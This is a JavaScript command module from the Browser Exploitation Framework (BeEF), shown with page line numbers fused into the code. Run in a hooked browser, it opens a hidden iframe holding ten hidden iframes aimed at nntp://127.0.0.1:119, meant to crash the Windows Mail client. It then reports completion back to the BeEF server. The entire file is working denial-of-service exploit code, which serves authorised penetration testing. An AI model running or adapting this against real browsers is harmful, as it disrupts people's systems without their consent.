Path: blob/master/modules/exploits/local_host/window_mail_client_dos/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78// container iframe9var winmail_container = document.createElement('iframe');10winmail_container.setAttribute('id', 'winmail');11winmail_container.setAttribute('style', 'display:none');12document.body.appendChild(winmail_container);1314// initiate 10 nntp connections15// 8 to trigger bug + 2 in case the user manages to close some16var protocol_iframe;17for(var i=1;i<=10;i++) {18protocol_iframe = document.createElement('iframe');19protocol_iframe.setAttribute('src', 'nntp://127.0.0.1:119//');20protocol_iframe.setAttribute('id', 'winmail'+i);21protocol_iframe.setAttribute('style', 'display:none');22winmail_container.contentWindow.document.body.appendChild(protocol_iframe);23}2425beef.net.send("<%= @command_url %>", <%= @command_id %>, "complete");2627document.body.removeChild(document.getElementById('winmail'));2829});303132